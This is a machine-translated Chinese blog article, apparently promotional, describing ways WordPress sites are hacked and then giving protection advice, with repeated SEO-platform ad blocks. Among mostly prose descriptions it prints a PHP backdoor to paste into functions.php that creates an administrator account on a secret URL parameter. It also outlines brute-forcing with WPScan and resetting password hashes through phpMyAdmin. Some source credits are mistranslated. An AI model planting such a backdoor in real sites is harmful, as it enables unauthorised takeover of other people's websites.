如何破解WordPress](introduction.png)
介绍
在开始这篇文章之前,我们想让你知道,黑客攻击是非法的,我们不鼓励任何恶意的活动。这篇文章只是为了让你了解骗子是如何工作的,以及各种网站安全方法对防止他们的危害是多么重要。我们来讨论一下。
- 骗子是如何入侵WordPress的?
- 如何保护你的WP网站不受骗子攻击?
所以,不用再多说了,让我们开始讨论这个话题。
如何在网上黑掉WordPress网站?
!如何在线破解WordPress网站 (Source:wpsecurityninja.com)
###使用WPScan。 WPScan是一个WP安全扫描器,可以帮助网站所有者检查他们的WordPress网站是否有漏洞,但这个扫描器也被黑客利用来实现他们黑掉网站的动机。
WPScan允许网站所有者和管理员指定WP用户账户和暴力破解密码,是获得未经授权访问WP账户的首要步骤。
(使用WPScan暴力破解用户名和密码。源于此。Medium)
MIM攻击。
在用户使用类似局域网的情况下,中间人(MIM)攻击可以很容易地进行。非加密的用户登录是一个软目标,因为所有的细节都可以通过纯文本看到。
参与进行这些类型的攻击的软件可以发现被破坏的主题、插件并可以列举用户。
(来源:《中国新闻周刊》。Medium)
SQL注入。
SQL注入攻击被认为是用于渗透网站的最突出攻击。这些攻击的目标是网站的后台网关,并允许黑客通过实施妥协的命令来渗透它们。
有效SEO的一体化平台
每个成功的企业背后都有一个强大的SEO活动。但是,有无数的优化工具和技术可供选择,很难知道从哪里开始。好了,不要再害怕了,因为我已经得到了可以帮助的东西。介绍一下Ranktracker有效的SEO一体化平台
(来源:[secure.wphackedhelp.com](https://secure.wphackedhelp.com/blog/hack-wordpress-website/#How_To_Hack_A_WordPress_Website_8211_Various_Ways))
这些渗透还允许黑客修改数据库和命令,删除或窃取网站信息。
由于这些SQL攻击发现了易受攻击和未打补丁的网站,它们使黑客的任务变得容易和成功。
###利用我的SQL/cPanel。
在这种方法中,黑客创建一个假账户或修改当前WP网站用户的密码。黑客试图通过打开PhpMyAdmin来渗透到cPanel。他们在寻找以_users结尾的表,并找到他们想要修改的用户。
这将允许他们改变他们计划入侵的用户的凭证。他们通过打开在线MD5生成器追踪用户并改变用户的密码(来自user_pass字段),并将其替换为他们想要的密码,然后点击#。
有效SEO的一体化平台
每个成功的企业背后都有一个强大的SEO活动。但是,有无数的优化工具和技术可供选择,很难知道从哪里开始。好了,不要再害怕了,因为我已经得到了可以帮助的东西。介绍一下Ranktracker有效的SEO一体化平台
! 利用我的SQL/cPanel (用户名、用户的哈希密码、他们的电子邮件ID等都存储在wp_users数据库表中。源于此。firstsiteguide.com)
用户名、用户的哈希密码、他们的电子邮件ID等都存储在wp_users数据库表中。
###编辑Functions.php。
黑客也会进入cPanel来修改Functions.php文件。通过解锁文件管理器,他们寻找活动主题的文件夹。 从public_html/wp_content/themes文件夹中,他们追踪主题,并通过放置他们破坏的代码来编辑 functions.php。由于黑客已经创建了一个新的账户,所以黑客已经在进行中了。一旦完成,他们就会擦除被破坏的代码。
通过FTP创建一个新的用户账户。
一般来说,FTP账户帮助网站所有者在其网站内生成一个目录,允许特定的用户使用其登录凭证上传/下载他们的文件。
这些文件也可以在互联网上查看。
> 在网站上创建一个FTP账户的步骤:。 > > - 输入所需的数据 > - 输入新的FTP用户的用户名 > - 输入用于分配账户的密码,以便通过FTP访问 > - 输入用于通过FTP访问的目录名称 > - 写下您希望分配给该文件夹的所需MB空间。 > - 然后按*"创建 "*按钮创建新帐户。
新用户必须加载以下数据才能通过FTP获得访问权。
地址/主机名/地址:yourdomain.com或ftp.yourdomain.com
用户/用户:[email protected]
密码:分配给 这个FTP账户的El密码
端口:21 命名用于上传/下载文件的文件夹。
新用户将对所选目录及其包含的所有子目录拥有读写权限。
例如,如果你创建了客户用户,并给他访问/home / user / public_html的权限
通过后门渗透。
渗透网站的恶意方式是通过后门。无论是想进入你的网站的诈骗者,还是想通过后门进入重新获得网站访问权的受害用户,他们都需要遵循以下步骤。
在某些情况下,当通过FTP创建一个新的用户账户或进行密码重置时,但没有得到理想的结果,用户可能想通过后门进入黑掉他们的网站,找回他们的管理权限。
创建后门的步骤:
- 打开 functions.php 文件并粘贴下面的代码。
add_action('wp_head', 'wploop_backdoor');
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
- 稍后保存更改。
加密货币劫持和加密货币开采。
加密货币的流行催生了新的网络威胁,如crypto-jacking,它也被称为加密货币采矿恶意软件。
违背用户的意愿以及意识而没收计算机的行为被称为加密劫持。在加密劫持恶意软件中,骗子通过软件传递的恶意软件感染用户的计算机,以破坏系统和网络。
网络钓鱼。
网络钓鱼是一种方法,欺诈者通过冒充合法实体欺骗用户的敏感信息(登录凭证、社会账户号码、密码、信用卡详细信息等)。他们通常借助于电子邮件来实现其目的。
> **例子:**骗子可能冒充可靠的来源,从用户那里收集个人资料,以满足他们的愿望。 > 他们还可能在钓鱼邮件中放置一个坏链接,并将他们引向一些欺诈性网站以传递恶意软件。
恶意软件。
*WordPress安全统计表明,有4000个WP网站由于假的SEO插件而被恶意软件感染。
骗子们不需要一个源头来传递恶意软件。SEO插件、WP主题以及网站中存在的许多其他因素都促使黑客使用最近的WP-VCD恶意软件。
甚至钓鱼邮件也是传递恶意软件的门路。
在这里,黑客的座右铭也是一样的,即通过渗透系统和窃取信息获得用户的敏感数据。
WordPress勒索软件。
在WP勒索软件中,黑客使用恶意软件来阻止用户访问系统和网络。用户可以通过支付黑客所要求的赎金来恢复这些数据。 > 例子: Petya攻击,黑客对你的文件和数据进行加密,并对解密密钥要求赎金。
跨站脚本(XSS)攻击。
XSS攻击是由黑客通过向网站注入恶意内容,从而利用浏览器来进行的。这种攻击允许黑客从cookies中窃取数据,修改网站内容,并抓住网站获取敏感数据。
###点击劫持。 在点击劫持中,黑客恶意地试图破坏一个按钮/链接,并促使用户点击被破坏的对象。 这允许黑客执行恶意命令,以获取用户的敏感数据。
欺骗。
欺骗是一种攻击,在这种攻击中,某人将自己伪装成一个值得信赖的身份,以获得用户的非法利益,欺骗他们提交他们的机密信息。
为了防止所有这些黑客攻击,需要采取具体的安全措施来保护你的WP网站。
如何保护WordPress网站免受黑客攻击?
!如何保护WordPress网站免受黑客攻击? (来源:envisaged digital.co.uk)
以上的统计数据足以说明WordPress的受欢迎程度。正是这种受欢迎程度使得这个CMS平台在黑客中更受欢迎,他们尝试各种黑客方法来获取WP网站和他们的数据。
因此,了解如何防止黑客访问你的WP网站是非常重要的。
###用SSL证书保护你的WP网站。
当任何数据被加载到网站上时,它总是以纯文本形式存在,包括黑客在内的所有人都很容易看到。这可能是有风险的,因为黑客可以滥用你的网站数据。
SSL *(安全套接字层)*证书是那些有助于用256位加密安全保护你的WP网站的数字证书,从而将你的网站数据转换为编码格式。
黑客虽然获得了对你网站的访问权,但却无法读取代码,因此他们被迫离开这样的网站。
用SSL证书保护你的WP网站](ssl.jpg) (来源:《中国新闻周刊》。clickssl.net)
选择你想要的SSL证书品牌(Comodo、Thawte、RapidSSL等)并在你的WP网站上安装相同的证书。就SSL证书的类型而言,你需要了解域名和子域名。例如,如果你的WP网站有子域,那么,一个便宜的通配符证书大约只需要*45美元/年,就可以保证你的整个数字业务。
快速签发、2048位密钥加密、促进搜索引擎优化、网站信任印章、99%的浏览器/移动设备兼容性、退款政策和保修是安装野卡SSL证书的一些特点和好处。
SSL产品的各种品牌和选择、预算友好的价格和优秀的客户服务是接近ClickSSL商店以确保WP网站安全的几个好处。
###更新你的雇员。
人为的错误可能是灾难性的,所以一定要确保让你的员工了解最新的网络威胁,避免他们受到伤害。
如果你的员工能够在初始阶段追踪到黑客网站的可疑信号,他们可以通知有关方 面,防止你的网站和业务受到进一步的损害。
使用双因素认证(2FA)。
在网站登录过程中实施2FA是抵御蛮力攻击的最关键的方法。除了增加另一个安全层,它们还可以防止网站和用户数据。
这是因为如果一个安全层被破坏,诈骗者需要入侵第二层来获得网站的访问权。
这是一个艰难的决定,因此在大多数情况下,诈骗者最终会转移到其他安全性差的网站。
> 提示: WP 2FA是一个免费的WP插件,为你的WP网站提供一个额外的安全层。
定期审计管理员用户。
这对你的WP网站的安全非常重要。确保定期审核您的管理用户,并交叉检查他们的访问权限。
同时确保你的用户以及员工根据他们的任务拥有有限的访问权限,以防止安全漏洞。
定期更新WordPress核心。
不了解WP核心?
让我告诉你,WP核心包括所有WP工作所需的基本基础文件。
从WordPress.org下载的WP压缩文件中的文件列表
(Source:ithemes.com)
这些核心文件需要在安全更新发布后定期更新,以修补所有的安全漏洞。
从值得信赖的来源下载WP主题和插件。
这是至关重要的,因为当插件没有更新或从不可信的来源安装时,它们可能会很危险。在使用免费/付费插件的情况下,一定要检查以下所述的因素,如。
- 用户评级和评论
- 用户友好度
- 兼容性
- 安全性
- 可信度
下载值得信赖的WP主题和插件](image11.png) (Source:torquemag.io)
这条规则也适用于安装WP主题。
###定期更新WP主题和插件。
过时或过期的WP主题和插件总是对你的WP网站构成威胁,因为它们的安全标准已经丧失了。为了防止黑客利用这种途径传播恶意软件来获取网站访问权,请确保定期更新您的WP网站中使用的主题和插件。
这将有助于插件的正常运行,并与最新版本的WP保持同步。
> **提示:**在插件页面,您可以查看所有已安装的插件,以及每个插件旁边的 "启用自动更新 "链接。把它打开,以便自动更新。
###修改默认的管理员名称。
黑客太聪明了,他们可以通过使用默认的管理名称轻松地渗透到你的WP网站。最好是修改默认的管理用户名,以防止黑客执行暴力攻击以获得对你网站的未经授权的访问。
授予有限的访问权。
永远不要给予超过必要的权限,同样的规则也适用于授予用户以及雇员的网站权限。
访问控制是网站和数据安全的首要规则,因为它定义了谁能或不能访问网站。为了网站的安全,封锁WP管理和其他关键代码和数据的所有入口。
限制访问不仅能提高生产力,而且还能保证你的网站不被恶意进入。
###更新WordPress。
当你的WordPress没有更新时,你的网站就有被黑客入侵的风险。
WordPress占据了37%的市场份额,而且它不断地定期发布更新,以修复安全漏洞和错误。这些更新还包括新的功能和对现有功能的改进,这对提高你的网站性能很有用。
有效SEO的一体化平台
每个成功的企业背后都有一个强大的SEO活动。但是,有无数的优化工具和技术可供选择,很难知道从哪里开始。好了,不要再害怕了,因为我已经得到了可以帮助的东西。介绍一下Ranktracker有效的SEO一体化平台
为什么你应该经常更新你的WordPress](update-wordpress.png) (来源:《中国新闻周刊》。wpbeginner.com)
保持你的WP网站更新,以获得强大的安全性。
总结。
使用强大而复杂的密码,保持你的WP网站以及插件和主题的更新,以修复所有的安全漏洞。花时间教育你的员工,因为这总是有助于预防灾难。
永远不要在安全问题上松懈,并始终确保使用最好的和值得信赖的安全插件,以保持你的WP网站安全不受窥视。此外,用SSL保护你的网站,以提高客户的信任,业务和[SEO](/blog/what-is-seo/)。
现在你已经知道了黑客是如何运作的,我们希望这篇文章能帮助你防止黑客渗透到你的网站,并以安全的方式管理你的WP网站。